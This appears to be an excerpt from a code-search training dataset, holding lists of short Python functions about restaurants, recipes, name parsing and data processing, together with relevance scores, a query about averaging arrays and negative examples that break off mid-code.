"def filtrar(self,iniciales):\r\n\t\tfor cliente in self:\r\n\t\t\tif cliente.nombre[:len(iniciales)].lower() == iniciales.lower():\r\n\t\t\t\tprint(\"{},{}\".format(cliente.nombre,cliente.total))",
"def get_shop_list_by_dishes(cook_dict, dishes, person_count):\n temp_dict = dict()\n for dish_name in dishes:\n for dish_type, ingredient_list in cook_dict.items():\n if dish_type == dish_name:\n for ingr_dict in ingredient_list:\n ingr_name = ingr_dict['ingredient_name']\n if temp_dict.setdefault(ingr_name) is None:\n temp_dict[ingr_name] = {\n 'quantity': ingr_dict['quantity'] * person_count, 'measure': ingr_dict['measure']\n }\n else:\n temp_dict[ingr_name]['quantity'] += ingr_dict['quantity'] * person_count\n return temp_dict",
"def describe_restaurant(self):\n\t\tprint(f\"{self.restaurant_name.title()} serves {self.cuisine_type}.\")",
"def apply_post_processing(df):\n for tccount, name in enumerate(df.Name.unique(), start=1):\n sloc = df.loc[df['Name'] == name, 'SLOC'].tolist()\n mccabe = df.loc[df['Name'] == name, 'McCabe'].tolist()\n\n df.loc[df['Name'] == name, 'SLOC'] = list(accumulate(sloc, lambda x, y: y if y else x))\n df.loc[df['Name'] == name, 'McCabe'] = list(accumulate(mccabe, lambda x, y: y if y else x))",
"def fuzzyfinder(user_input, collection):\n suggestions = []\n pattern = '.*?'.join(user_input) # Converts 'djm' to 'd.*?j.*?m'\n regex = re.compile(pattern, re.IGNORECASE)\n for item in collection:\n match = regex.search(item)\n if match:\n suggestions.append((len(match.group()), match.start(), item))\n\n return [x for _, _, x in sorted(suggestions)]",
"def process_file(file_name):\n \n restaurant_ratings = {}\n \n # open file, iterate line by line\n restaurant_file = open(file_name)\n # split by colon, returns a list\n for line in restaurant_file:\n restaurant_name, restaurant_rating = line.rstrip().split(\":\")\n restaurant_ratings[restaurant_name] = int(restaurant_rating)\n\n # close file\n restaurant_file.close()\n return restaurant_ratings",
"def get_recipe_by_name(self, name):\n\t\tfor key, val in self.recipes_list.items():\n\t\t\tfor a, b in val.items():\n\t\t\t\tif name == a:\n\t\t\t\t\tprint(str(b))",
"def describe_restaurant(self):\n\t\tprint(f\"The resaurant name is {self.restaurant_name}.\")\n\t\tprint(f\"The resaurant type is {self.restaurant_type}.\")",
"def describe_restaurant(self):\r\n\t\tprint(\"Our restaurant is \" + self.restaurant_name.title() + \".\")\r\n\t\tprint(\"We are known for our \" + self.cuisine_type.title())",
"def restaurant_search():\n # Get query string parameters\n query_string = request.args.get('q')\n latitude = request.args.get('lat')\n longitude = request.args.get('lon')\n\n # Check that request parameters are valid, if not send 400 response \n if query_string == None or len(query_string) < 1:\n response_data = {\n \"error\": \"Query string length is missing or is too short (minimum length is 1 character)\"\n }\n return make_response(jsonify(response_data), 400)\n if latitude == None or not isfloat(latitude) or latitude == \"\":\n response_data = {\n \"error\": \"Latitude coordinate is missing or is not a float.\"\n }\n return make_response(jsonify(response_data), 400)\n if longitude == None or not isfloat(longitude) or longitude == \"\":\n response_data = {\n \"error\": \"Longitude coordinate is missing is not a float.\"\n }\n return make_response(jsonify(response_data), 400)\n\n try:\n # load json file into dict\n json_file = open(\"restaurants.json\", \"r\")\n json_data = json.load(json_file)\n\n\n matching_restaurants = []\n for restaurant in json_data[\"restaurants\"]:\n # Get restaurant name, description, and tags and concatenate into one string\n concatenation = restaurant[\"name\"] + restaurant[\"description\"]\n for tag in restaurant[\"tags\"]:\n concatenation += tag\n # Filter restaurants in lowercase while removing all whitespaces from concatenation and query string string, such as space, tab, newline, etc.\n if \"\".join(query_string.split()).lower() in \"\".join(concatenation.split()).lower():\n # If filter matches, calculate distance using haversine formula assuming location in json data is stored in format [lon, lat].\n distance = haversine.haversine((float(latitude), float(\n longitude)), (restaurant[\"location\"][1], restaurant[\"location\"][0]))\n if distance < 3:\n matching_restaurants.append(restaurant)\n return make_response(jsonify(matching_restaurants), 200)\n except Exception as exc:\n print(exc)\n response_data = {\n \"error\": \"Unexpected Server error.\"\n }\n return make_response(jsonify(response_data), 500)",
"def calc_total(records, names):\n total = 0\n for rec in records:\n if rec['name'] in names:\n total += rec['price']\n return total",
"def main():\n records = get_block_of_records({\"keyword\": \"food\"})\n print (\"returned items: {}\".format(len(records)))\n\n processed_records = {}\n for item in records:\n meta = item[\"meta\"]\n umm = item[\"umm\"]\n cid = meta[\"concept-id\"]\n short_name = umm[\"ShortName\"]\n processed_records[cid] = short_name\n\n print (\"uniq keys: {}\".format(len(processed_records.keys())))",
"def alphabetize_restaurant_ratings(filename):\n\n restaurant_log = open(filename)\n\n restaurants = {}\n\n for line in restaurant_log:\n data = line.rstrip().split(\":\")\n restaurants[data[0]] = data[1]\n\n alphabetized_restaurants = sorted(restaurants.items(), key=lambda row: row[0])\n\n for restaurant in alphabetized_restaurants:\n print \"%s is rated at %s.\" % (restaurant[0], restaurant[1])",
"def describeRestaurant(self):\n print (f\"{self.name} has the best {self.cuisineType}\")",
"def alphabetized_restaurant_ratings(restaurant_ratings_dictionary):\n for name, rating in sorted(restaurant_ratings_dictionary.items()):\n print(f\"{name} is rated at {rating}.\")",
"def get_taxids(organism_names):\r\n\r\n taxids = []\r\n\r\n for organism in organism_names:\r\n handle = Entrez.esearch(db=\"Taxonomy\", term=organism)\r\n record = Entrez.read(handle)\r\n print(record[\"IdList\"])\r\n try:\r\n taxids.append(record[\"IdList\"][0])\r\n except IndexError:\r\n pass\r\n\r\n return taxids",
"def filter_distance(rest_list, user, dist=10):\n user_location = get_lat_long(user)\n rest_dict1 = dict()\n rest_dict2 = dict()\n for restaurant in rest_list:\n rest_name = restaurant[0]\n rest_address = restaurant[1] + ', ' + \\\n restaurant[2] + ', '+restaurant[3]\n rest_location = get_lat_long(rest_address)\n rest_dist = get_distance(rest_location, user_location)\n if rest_dist < dist:\n if rest_name in rest_dict1:\n if rest_dist < rest_dict1[rest_name]:\n rest_dict1[rest_name] = rest_dist\n rest_dict2[rest_name] = rest_address\n else:\n rest_dict1[rest_name] = rest_dist\n rest_dict2[rest_name] = rest_address\n return rest_dict2",
"def name_distribution_from_matches(matches):\n dist = defaultdict(lambda: 0)\n\n total = len(matches)\n for match in matches:\n dist[match[0].lower()] += 1\n\n # prefer names in all caps\n if match[0].isupper():\n dist[match[0].lower()] += 10\n total += 10\n for key in dist.keys():\n dist[key] = dist[key]/float(total)\n return dist",
"def organize_dupes(results):\n organized_results = defaultdict(dict)\n for duplicates in results['dupes']:\n for dupe_instance in duplicates['lst']:\n composer = dupe_instance.get(\"composer\")\n piece_title = dupe_instance.get('piece', 'NO_PIECE')\n stripped_instance = {\n 'att_id': dupe_instance['att_id'],\n 'att_title': dupe_instance['path'].split('/')[-1],\n 'movement': dupe_instance['movement']\n }\n if not organized_results[composer].get(piece_title):\n organized_results[composer][piece_title] = []\n organized_results[composer][piece_title].append(stripped_instance)\n\n return organized_results",
"def get_menu_items_based_on_restaurant(restaurant_id):\n result_dictionary = dict()\n result_items_list = []\n restaurant = Restaurant.objects.get(pk=restaurant_id)\n result_dictionary['restaurant'] = {\n 'name': restaurant.name,\n 'location': restaurant.address,\n 'deliveryTime': restaurant.delivery_time\n }\n items = list(restaurant.menus.all().values())\n for item in items:\n item_instance = Item.objects.get(pk=item.get('item_id', None))\n result_items_list.append({\n 'name': item_instance.name,\n 'description': item_instance.description,\n 'price': item_instance.price,\n 'category': item_instance.category,\n 'sub_category': item_instance.sub_category\n })\n result_dictionary['itemsList'] = result_items_list\n return result_dictionary",
"def extract_foods(complete_text: List[List[str]]) -> List[str]:\n foods: List[str] = []\n non_foods: List[str] = [\"Authorization Code\", \"Card\", \"Change\", \"Sales Tax\", \"Sub Total\", \"Total\", \"Total Due\", \"Total Savings\"]\n for unprocessed_line in complete_text:\n processed_line: str = \"\"\n for word in unprocessed_line:\n if len(word) > 2:\n processed_line += word\n processed_line += \" \"\n processed_line = processed_line.strip()\n if (is_food(processed_line)) and (processed_line != \"\") and (processed_line not in non_foods):\n foods.append(processed_line)\n return(foods)",
"def process_names():\n with open(input_names_file, 'r') as data:\n plaintext = data.read()\n name_array = plaintext.split('\\n')\n\n # Final name list\n final_name_list = []\n\n # Parsing different name formats and standardizing to create csv\n for name in name_array:\n if len(name.split(',')) == 2:\n temp_name_list = re.split(reg_ex, name)\n last_name = temp_name_list.pop()\n first_name = temp_name_list.pop()\n final_name_list.append(last_name + ',' + first_name)\n elif len(name.split(' ')) == 2:\n final_name_list.append(name.replace(' ', ','))\n elif len(name.split(' ')) == 3:\n temp_name_list = re.split(' ', name)\n last_name = temp_name_list.pop()\n middle_name = temp_name_list.pop()\n first_name = temp_name_list.pop()\n final_name_list.append(first_name + ',' + middle_name + ' ' + last_name)\n else:\n final_name_list.append(name)\n\n # Writing final name list to a file\n with open(output_names_file, \"w\") as txt_file:\n txt_file.write(\"first_name,last_name\" + \"\\n\")\n for name in final_name_list:\n txt_file.write(name + \"\\n\") # works with any number of elements in a line\n\n names_df = pd.read_csv(output_names_file, names=name_header, sep=',', engine='python')",
"def collect_data(self, data: Restaurant) -> Restaurant:\n smiley = get(data.url)\n smiley_soup = BeautifulSoup(smiley.content.decode('utf-8'), 'html.parser')\n\n for appender in self.appenders:\n data = appender(smiley_soup, data)\n\n return data",
"def getListIngrName(cls, user):\n\n # meals = Meals.getMealsByFutureDate(user=session['User'])\n list_ingr = db.session.query(RecipeIngredient).join(Recipe).join(Meals).\\\n join(Ingredient).\\\n filter(func.substr(Meals.date_planned,0,11) >= func.substr(datetime.today(),0,11)).\\\n filter(Meals.recipe_fk==Recipe.recipe_id).\\\n filter(Recipe.recipe_id==RecipeIngredient.recipe_fk).\\\n filter(RecipeIngredient.ingredient_name==Ingredient.name).\\\n filter(Meals.user_fk==user).\\\n order_by(Ingredient.aisle).all()\n # order_by(Meals.date_planned).all()\n print \"LIST INGREDIENT\", list_ingr\n return list_ingr",
"def add_data(self, data: Restaurant):\n if not data.name_seq_nr:\n raise ValueError('Expected data to have \"name_seq_nr\" key')\n\n self.__data[data.name_seq_nr] = data\n\n data_to_dump = []\n for restaurant in self.__data.values():\n data_to_dump.append(restaurant.as_dict())\n \n self._write_json(data_to_dump)",
"def query_drug_names(names, verbose=0):\n all_pert_ids = set()\n for query_string in names:\n query_string = query_string.replace(' ', '-').upper()\n response = requests.get(L1000FWD_URL + 'synonyms/' + query_string)\n found_match = False\n if response.status_code == 200:\n for result in response.json():\n if query_string == result['Name'].upper():\n all_pert_ids.add(result['pert_id'])\n found_match = True\n if verbose and not found_match:\n print(query_string + ' not found')\n\n all_pert_ids = _get_drugs_in_metadata(all_pert_ids)\n return _convert_pert_id_to_InChI(all_pert_ids)",
"def describe_restaurant(self):\n print(self.name.title() + \" is known for it's \" + self.cuisine.title() + \".\")",
"def get_restaurants(term, lat=\"37.788744\", lon=\"-122.411587\", radius=\"805\"):\n\n # Create OAuth2 token and store in session (we don't need to get a new one\n # for every API request)\n\n access_token = get_access_token()\n\n if not SEEDING:\n if \"access_token\" not in session:\n session[\"access_token\"] = access_token\n\n base_url = \"https://api.yelp.com/v3/businesses/search\"\n\n # Create a Unix timestamp for current day at 1:00 PM\n year = datetime.now().year\n day = datetime.now().day\n month = datetime.now().month\n open_time = datetime(year, month, day, 13, 0, 0)\n\n unix_time = time.mktime(open_time.timetuple())\n unix_time_trunc = int(unix_time)\n\n # Set parameters for our request to the business search API.\n parameters = {\n \"latitude\": lat,\n \"longitude\": lon,\n \"radius\": radius,\n \"term\": term,\n \"categories\": \"restaurants\",\n \"limit\": 24,\n \"price\": \"1,2,3\",\n \"sort_by\": \"distance\",\n \"open_at\": unix_time_trunc,\n }\n\n # FIXME: Store resulting JSON data in database...\n\n # Fetch all restaurants that fit these parameters and capture the response.\n response = requests.get(url=base_url,\n params=parameters,\n headers={\n 'Authorization': 'Bearer {token}'.format(\n token=access_token)\n })\n\n # Extract just the business info.\n return response.json()['businesses']",
"def apartaments(self, soup):\n logging.info('Getting hotel apartaments information.')\n apartaments = []\n if soup.select_one('table.hprt-table') is None:\n logging.error('Cant apartaments information.')\n return apartaments\n else:\n apartament_name = ''\n for apart in soup.select_one('table.hprt-table').findAll('tr')[1:]:\n apartament = {}\n try:\n logging.info('Getting apartaments name.')\n apartament['name'] = apartament_name = apart.select_one(\n 'span.hprt-roomtype-icon-link').text.strip()\n except AttributeError:\n logging.error('Cant apartaments name.')\n apartament['name'] = apartament_name\n try:\n logging.info('Getting apartaments price.')\n apartament['price'] = int(apart.select_one(\n 'div.bui-price-display__value.prco-inline-block-maker-helper.prco-font16-helper'\n ).text.strip()[:-5].replace(\" \", \"\"))\n except Exception:\n logging.error('Cant apartaments price.')\n continue\n try:\n logging.info('Getting apartaments capacity.')\n apartament['capacity'] = apart.select_one(\n 'div.c-occupancy-icons.hprt-occupancy-occupancy-info'\n ).select_one('span.bui-u-sr-only').text.strip().split(':')[1].strip()\n except AttributeError:\n logging.error('Cant apartaments capacity.')\n continue\n apartaments.append(apartament)\n\n return apartaments",
"def build_frequency_list(name_list):\n analyzer = build_analyzer()\n char_list = []\n for name in name_list:\n char_list += analyzer(name)\n return char_list",
"def recommend(file, price, cuisines_list):\r\n\r\n #read the file.Build data structures\r\n name_to_rating, price_to_names, cuisine_to_names = read_restaurant(file)\r\n\r\n\r\n #look for price\r\n #price: look up the list of restaurant names for the price\r\n\r\n #Now we have a list of restaurants in the right price range\r\n #Need a new list of restaurants that serve one of the cuisines\r\n\r\n\r\n #Need to look at ratings and sort this list\r\n\r\n\r\n #Return the sorted list\r",
"def parse_pizza_info(l):\n\n pizza_dict = {}\n\n for i, element in enumerate(l):\n if element.strip() == '<span class=\"meal-name\" itemprop=\"name\">':\n\n # Names of pizza\n pizza_name = l[i+1].split('<')[0].strip()\n pizza_dict[pizza_name] = []\n\n elif '<div class=\"meal-description-additional-info\" itemprop=\"description\">' in element:\n\n pizza_dict[pizza_name] = re.split(',|and',re.split('<|>|\\(', element.strip())[2])\n pizza_dict[pizza_name] = [x.strip() for x in pizza_dict[pizza_name]]\n pizza_dict[pizza_name] = [x.strip('-') for x in pizza_dict[pizza_name]]\n\n return pizza_dict",
"def get_results(self):\n d = {}\n# r = {}\n for analyser in self.xml_tree.getroot():\n for child in analyser:\n if child.tag == 'all-records':\n for record in child:\n attributes = record.attrib\n sample = attributes['sampleId']\n assay_id = attributes['assayId']\n genotype = attributes['genotypeId']\n quality = attributes['description'].split('.')[0]\n if re.match(r'rs\\d+', assay_id):\n if sample in d:\n if assay_id in d[sample]:\n for allele in list(genotype):\n if allele not in d[sample][assay_id]['genotype']:\n d[sample][assay_id]['genotype'] += allele\n if quality not in d[sample][assay_id]['quality']:\n d[sample][assay_id]['quality'].append(quality)\n else:\n d[sample][assay_id] = {'genotype': genotype, 'quality': [quality]}\n else:\n d[sample] = {assay_id: {'genotype': genotype, 'quality': [quality]}}\n# if sample in r:\n# if assay_id in r[sample]:\n# for allele in list(genotype):\n# if allele not in r[sample][assay_id]:\n# r[sample][assay_id] += allele\n# else:\n# r[sample][assay_id] = genotype\n# else:\n# r[sample] = {assay_id: genotype}\n# for k, v in r.items():\n# for k1, v1, in v.items():\n# if len(v1) == 1:\n# v[k1] += v1\n# pprint.pprint(r)\n# df = pd.DataFrame.from_dict(r).transpose()\n# print(df)\n# df.to_excel('snpcheck.xlsx')\n return d",
"def _compute_name(self):\n for rec in self:\n rec.name = rec._get_computed_name(rec.lastname, rec.firstname)",
"def amount_gathering(user_recipe):\r\n #Forms Dictionary\r\n sales_stats = dictionary_formation()\r\n amount_list = []\r\n month_list = [\"Nov\", \"Dec\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\",\r\n \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\"]\r\n for month in month_list:\r\n bottles_amount = 0\r\n dicts_read = 2\r\n for dicts_read in sales_stats:\r\n analyse_dict = sales_stats[str(dicts_read)]\r\n if month in analyse_dict[\"date_required\"]:\r\n if analyse_dict[\"recipe\"] == user_recipe:\r\n bottles_amount += analyse_dict[\"quantity_ordered\"]\r\n amount_list.append(bottles_amount)\r\n return amount_list",
"def drug_names_on_drug_list(drug_list):\n return [dl[\"Drug (brand name)\"] for dl in drug_list]",
"def add_restaurant_rating(restaurant_ratings):\n\n user_restaurant = raw_input(\"Enter a restaurant name: \")\n user_rating = int(raw_input(\"Enter a restaurant rating between 1-5: \"))\n\n # prompt user for new restaurant and rating, add to dictionary\n restaurant_ratings[user_restaurant] = user_rating\n\n return restaurant_ratings",
"def getCounts():\n for area in AREAS:\n print(area['name'])\n lat = area['lat']\n lng = area['lng']\n count = utils.getExtracted(countCrimes, lat, lng)\n print('count: %s' % count)\n if type(count) is list:\n area['count'] = count[0]\n return AREAS",
"def dataExtract(queryResults):\n days = ['MondayCollect',\n 'TuesdayCollect',\n 'WednesdayCollect',\n 'ThursdayCollect',\n 'FridayCollect',\n 'SaturdayCollect',\n 'SundayCollect']\n\n #counting the instances of bin collections\n parkCount = 0\n roadingCount = 0\n otherCount = 0\n\n #output totals of bin collections\n parkOutput = []\n roadingOutput = []\n otherOutput = []\n \n #iterate over each day\n for day in days:\n \n #iterate over the number of bins\n for i in range(len(queryResults)):\n \n #check if the bin was collected on the day...\n if str(queryResults[i]['attributes'][day]).strip().lower() == 'yes':\n \n #unknown formatting issue with the data, these lines fix it\n strResult = str(queryResults[i]['attributes']['Owner'])\n strResultForm = strResult.lower().strip()\n \n #update the counts if True\n if strResultForm == 'roading':\n roadingCount += 1\n elif strResultForm == 'parks':\n parkCount += 1\n elif strResultForm == 'private':\n otherCount += 1\n else:\n otherCount +=1\n\n #print \"Day: {} \\nparkCount: {} \\nroadingCount: {} \\notherCount: {} \\n\\n\".format(day,parkCount,roadingCount,otherCount)\n \n parkOutput.append(parkCount)\n roadingOutput.append(roadingCount)\n otherOutput.append(otherCount)\n \n parkCount = 0\n roadingCount =0\n otherCount =0\n \n return parkOutput,roadingOutput,otherOutput",
"def describe_restaurant(self):\n print(\"The Restaurant is called {} and offers {} cuisine.\".format(self.restaurant_name, self.cuisine_type))\n print(\"It has served {} clients.\".format(self.number_served))",
"def process_strings(self):\n for string in self.input:\n matcher = self.choose_algorithm()\n matcher.find_match(string, self.case_insensitive)\n self.__results = matcher.results\n\n if self.counter:\n self.__results = matcher.counts\n\n if self.__results:\n self.output(string)",
"def process_names( names ):\n\tp_list = []\n\tfor i in xrange( len( names ) ):\n\t\t#print i\n\t\tp_list.append( str(i) + \"__\" + names[i] )\n\n\tRV = \";\".join(p_list)\n\treturn( RV )",
"def describe_restaurant(self):\n print(f\"\\nRestaurant name: {self.restaurant_name}\")\n print(f\"Cuisine type: {self.cuisine_type}\")",
"def develop_output():\n output_array = []\n for docs in db.get_collection(\"google_places\").find({}):\n docs[\"city\"] = docs[\"vicinity\"].split(\",\")[-1].strip()\n del docs['_id']\n\n for mg_doc in db.get_collection(\"michelin_guide\").find({}):\n del mg_doc['_id']\n\n if (fuzz.token_set_ratio(docs[\"vicinity\"], mg_doc[\"datasheets\"][0][\"address\"]) > 80 and\n fuzz.token_set_ratio(docs[\"name\"], mg_doc[\"datasheets\"][0][\"name\"]) > 80):\n docs[\"michelin_stars\"] = mg_doc[\"datasheets\"][0][\"michelin_stars\"]\n docs[\"michelin_mention\"] = True\n docs[\"michelin_description\"] = mg_doc[\"datasheets\"][0][\"description\"]\n docs[\"michelin_url\"] = mg_doc[\"datasheets\"][0][\"web\"]\n break\n\n else:\n docs[\"michelin_stars\"] = 0\n docs[\"michelin_mention\"] = False\n docs[\"michelin_description\"] = None\n docs[\"michelin_url\"] = None\n\n for yelp_doc in db.get_collection(\"Yelp\").find({}):\n del yelp_doc['_id']\n if (fuzz.token_set_ratio(docs[\"vicinity\"], yelp_doc[\"location\"][\"address1\"]) > 80 and\n fuzz.token_set_ratio(docs[\"name\"], yelp_doc[\"name\"]) > 80):\n docs[\"yelp_stars\"] = yelp_doc[\"rating\"]\n docs[\"yelp_url\"] = yelp_doc[\"url\"]\n break\n\n else:\n docs[\"yelp_stars\"] = None\n docs[\"yelp_url\"] = None\n\n \"\"\" The results in Zomato are nested in one document,\n so this for loop breaks them up so the break logic\n works better.\n \"\"\"\n clean_zomato_list = []\n for zom_doc in db.get_collection(\"zomato\").find({}):\n del zom_doc['_id']\n for restaurant in zom_doc[\"restaurants\"]:\n clean_zomato_list.append(restaurant)\n\n for restaurant in clean_zomato_list:\n if (fuzz.token_set_ratio(docs[\"vicinity\"], restaurant['restaurant'][\"location\"][\"address\"]) > 80 and\n fuzz.token_set_ratio(docs[\"name\"], restaurant['restaurant'][\"name\"]) > 80):\n docs[\"zomato_stars\"] = restaurant['restaurant']['user_rating']['aggregate_rating']\n docs[\"zomato_timings\"] = restaurant['restaurant']['timings']\n docs[\"zomato_avg_for_two\"] = restaurant['restaurant']['average_cost_for_two']\n docs[\"zomato_events\"] = restaurant['restaurant']['events_url']\n break\n\n else:\n docs[\"zomato_stars\"] = None\n docs[\"zomato_timings\"] = None\n docs[\"zomato_avg_for_two\"] = None\n docs[\"zomato_events\"] = None\n\n if docs not in output_array:\n output_array.append(docs)\n\n #db.get_collection(\"outputs\").delete_many({})\n db.get_collection(\"outputs\").insert_many(output_array)",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name\n\t\tself.cuisine_type = cuisine_type\n\t\tself.number_served = 0",
"def plant_or_animal(namestr):\n\n namestr = namestr.lower()\n\n if namestr not in indices:\n return None\n\n i = indices[namestr]\n\n while taxa[i].parent != '1' and i != '1':\n if names[i].name in ['Metazoa', 'Viridiplantae', 'Arthropoda']:\n return names[i].name\n i = taxa[i].parent"
] | [
"0.64534056",
"0.5905663",
"0.5663056",
"0.55366874",
"0.5487185",
"0.548536",
"0.54789513",
"0.5476311",
"0.5471101",
"0.5353196",
"0.52232534",
"0.5216546",
"0.51967746",
"0.5166121",
"0.5148214",
"0.5069867",
"0.5060537",
"0.5055395",
"0.50514215",
"0.50165194",
"0.49850214",
"0.49823225",
"0.4976351",
"0.49680734",
"0.49550068",
"0.4905416",
"0.49046612",
"0.48881912",
"0.48878026",
"0.48776543",
"0.48742405",
"0.4862601",
"0.4857811",
"0.48552266",
"0.48537087",
"0.4837051",
"0.48317197",
"0.482732",
"0.48225525",
"0.48223191",
"0.4762036",
"0.47592586",
"0.47411042",
"0.47393417",
"0.47349858",
"0.47219083",
"0.47116333",
"0.47074842",
"0.47044748",
"0.46931684",
"0.46878028",
"0.46829584",
"0.46808326",
"0.4675926",
"0.46754763",
"0.46711442",
"0.46710902",
"0.46664464",
"0.46646813",
"0.4650122",
"0.4649697",
"0.46496922",
"0.46398667",
"0.46362263",
"0.463369",
"0.463268",
"0.46318594",
"0.46284676",
"0.4623089",
"0.46203378",
"0.4607836",
"0.45833528",
"0.45813525",
"0.45787445",
"0.4576377",
"0.45759726",
"0.45753378",
"0.4567561",
"0.4567073",
"0.4566202",
"0.45626327",
"0.4559378",
"0.45463476",
"0.45447552",
"0.45445094",
"0.45427084",
"0.4539976",
"0.45388958",
"0.4537451",
"0.45348704",
"0.45342302",
"0.45301744",
"0.45266238",
"0.4524319",
"0.45156598",
"0.451464",
"0.4510866",
"0.45091638",
"0.45091638",
"0.45067444"
] | 0.5873722 | 2 |
this function also works for multidimensional arrays It assumes that the first dimension is time/iteration | def averaged_1d_array(arr, partitions):
def f(p):
start, stop = p
sub_arr = arr[start : stop]
#from IPython import embed; embed()
return sub_arr.sum(axis=0)/(stop - start)
return np.array([f(p) for p in partitions]) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def conver1D(array):\n l = array.shape\n total = np.zeros((0, l[1] * l[2]), dtype=np.float32)\n i = 0\n for i in range(24):\n tempData = array[i]\n array1D = []\n for x in tempData:\n for s in x:\n array1D.append(s)\n total = np.insert(total, i, array1D, axis=0)\n return total",
"def loop(array, length):\n if len(array) < length:\n array = np.asanyarray(array)\n if len(array) == 0:\n return np.zeros((length,) + array.shape[1:], dtype=array.dtype)\n factor = length // len(array)\n if factor > 1:\n array = np.tile(array, (factor,) + (1,) * (array.ndim - 1))\n missing = length - len(array)\n if missing:\n array = np.concatenate((array, array[:missing:]))\n return array",
"def time_array():\n # Each mushroom is a non-zero value in the 2D array\n world = [[0 for _ in range(20)] for _ in range(20)]\n positions = list_of_positions()\n for (x, y) in positions:\n world[x][y] = random.randrange(1, 1000)\n\n time_start = time.time()\n\n # Iterate through the world,\n # incrementing each \"mushroom\"\n for x in range(20):\n for y in range(20):\n if world[x][y] > 0:\n world[x][y] += 1\n\n time_end = time.time()\n return time_end - time_start",
"def changeArray(array):\r\n\r\n return [[float(array[j][i]) for j in range(len(array))] for i in range(len(array[0]))]",
"def num_44():\n def block_array(a, rows=3, cols=4, col_first=True, nodata=-1):\n \"\"\" a variant on array_split\n requires a N*m array\n \"\"\"\n s = np.array(a.shape)\n w = np.array([rows, cols])\n m = divmod(s, w)\n new_shape = w*m[0] + w*(m[1]!=0)\n ypad, xpad = new_shape - a.shape \n b = np.pad(a, pad_width=((0, ypad),(0, xpad)), \n mode='constant', \n constant_values=((nodata, nodata),(nodata, nodata)))\n rn, cn = new_shape\n x_s = np.arange(0, cn+cols, cols)[1:] #.tolist()\n y_s = np.arange(0, rn+rows, rows)[1:] #.tolist()\n print(\"x_s {}\\ny_s {}\".format(x_s, y_s))\n #c = np.array([i for i in np.hsplit(b, x_s) if len(i) > 0])\n c = np.array([i for i in np.split(b, x_s, axis=1) if len(i) > 0])\n d = np.array([i for i in np.split(c, y_s, axis=1) if len(i) > 0])\n e = d.swapaxes(0, 1)\n ix = np.in1d(e.ravel(), nodata).reshape(e.shape)\n f = np.ma.array(e, mask=ix, fill_value=-1)\n return b, c, d, e, f\n y, x = 9, 11\n a = np.arange(x*y).reshape(y,x)\n b, c, d, e, f = block_array(a)\n print(\"\\n{}\".format(num_44.__doc__)) \n for i in [a, b, c, d, e, f]:\n _f(i)\n return a, b, c, d, e, f",
"def _process(self, data: np.ndarray) -> np.ndarray:",
"def _process(self, data: np.ndarray) -> np.ndarray:",
"def block_array(a, rows=3, cols=4, col_first=True, nodata=-1):\n s = np.array(a.shape)\n w = np.array([rows, cols])\n m = divmod(s, w)\n new_shape = w*m[0] + w*(m[1]!=0)\n ypad, xpad = new_shape - a.shape \n b = np.pad(a, pad_width=((0, ypad),(0, xpad)), \n mode='constant', \n constant_values=((nodata, nodata),(nodata, nodata)))\n rn, cn = new_shape\n x_s = np.arange(0, cn+cols, cols)[1:] #.tolist()\n y_s = np.arange(0, rn+rows, rows)[1:] #.tolist()\n print(\"x_s {}\\ny_s {}\".format(x_s, y_s))\n #c = np.array([i for i in np.hsplit(b, x_s) if len(i) > 0])\n c = np.array([i for i in np.split(b, x_s, axis=1) if len(i) > 0])\n d = np.array([i for i in np.split(c, y_s, axis=1) if len(i) > 0])\n e = d.swapaxes(0, 1)\n ix = np.in1d(e.ravel(), nodata).reshape(e.shape)\n f = np.ma.array(e, mask=ix, fill_value=-1)\n return b, c, d, e, f",
"def _is_1d_varray(arr):\r\n return len(arr.shape) < 2 or arr.shape[1] == 1",
"def transform(self, x: Array2D) -> Array2D:",
"def append_time_dim(arr, y_, time_stamps):\n time_arr = np.zeros([arr.shape[0]-time_stamps, int(time_stamps*arr.shape[1])])\n for time_idx, time_ in enumerate(np.arange(time_stamps, arr.shape[0])):\n for time_point in range(time_stamps):\n time_arr[time_idx, time_point*arr.shape[1]:(time_point+1)*arr.shape[1]] = arr[time_-time_point,:]\n return time_arr, y_[time_stamps:]",
"def __call__(self, array, axis=None):\n raise NotImplementedError()",
"def really1d(arr):\n if np.ndim(arr) != 1:\n return False\n # Empty list or array\n if len(arr) == 0:\n return True\n if np.any(np.vectorize(np.ndim)(arr)):\n return False\n return True",
"def a(a,N): \n a=np.ravel(a, order='F') # Same order\n return a",
"def a(a,N): \n a=np.ravel(a, order='F') # Same order\n return a",
"def ns_tarray_to_sFlat(t_arr, DEPTH = 2, iftime = False):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n # print(\"tarr : \", t_arr)\n do = 1 if iftime else 0\n print(\"do : \", do)\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n interv = 0\n sflat.append([])\n # sflat[i].append([0 for _ in range(DEPTH)])\n if iftime: \n abvp = [t_arr[0, 0, 3]]\n abvp.extend(list([0 for _ in range(DEPTH)]))\n else: abvp = [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm, dep = -1, do # tm -1 initiator\n \n # print(\"sFlat -____________- : \", sflat[i][0])\n\n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH + do: \n dep = do\n if ctime == t_arr[i, j, 0] and dep == do: \n continue\n elif ctime != t_arr[i, j, 0]:\n\n if iftime: \n abvp= [t_arr[i, j, 3]]\n abvp.extend([0 for _ in range(DEPTH)])\n else: abvp= [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm += 1\n dep = do\n if ctime + interv != t_arr[i, j, 0]:\n sflat[i][tm][1] = 0\n dep = do\n ctime += interv\n continue\n # print(\"DEP : \", dep, len(sflat[i][tm]), iftime)\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n interv = t_arr[i, j, 3]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n\n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH + do), 